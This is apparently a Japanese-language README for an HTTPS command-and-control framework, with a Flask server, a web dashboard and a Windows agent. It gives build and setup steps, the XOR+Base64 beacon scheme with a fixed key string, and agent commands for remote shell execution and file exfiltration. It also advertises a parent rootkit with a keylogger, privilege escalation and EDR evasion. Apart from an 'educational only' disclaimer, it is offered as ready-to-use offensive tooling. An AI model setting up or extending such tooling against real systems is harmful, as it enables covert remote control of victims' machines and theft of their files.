
暗号化されたビーコン、Webダッシュボード、Windowsエージェントを備えたHTTPS C&C Framework

HTTPS コマンド&コントロールインフラストラクチャ。Webダッシュボードを備え、リモートのWindowsエージェントを管理します。
⚠️ 教育目的のみ - 不正使用は自己責任です。
サーバー:
cd server
pip install flask
python c2_server.py
ダッシュボードにアクセス: https://localhost:8443
クライアント:
build.bat
編集 client/c2_client.cpp でサーバーIPを設定:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
暗号化: XOR + Base64
キー: ホスト名 + ユーザー名 + "SecretKey2025"
トランスポート: HTTPS(ポート8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
サーバー: Python 3.9+、Flask
クライアント: MinGW-w64 GCC 15.2+、Windows SDK、C++17
このC2フレームワークは、XvX Usermode Rootkitプロジェクトから抽出されました。フルルートキット版には、プロセス/ファイル/レジストリの隠蔽、SYSTEM権限昇格、インタラクティブなリバースシェル、キーロガー機能、DLLインジェクション、EDR回避テクニックなど、15以上のコマンドを備えたより完全なC2が含まれています。このスタンドアロン版は、教育目的とカスタムプロジェクトへの簡単な統合のために、コアC2インフラストラクチャを提供します。
著者: 28zaakypro[@]proton[.]me
| コマンド | 構文 | 説明 |
|---|
shell | shell <cmd> | シェルコマンドを実行 |
exfil | exfil <path> | ファイルを流出(Base64) |
sleep | sleep <seconds> | ビーコン間隔を変更 |
ping | ping | 接続をテスト |
die | die | エージェントを終了 |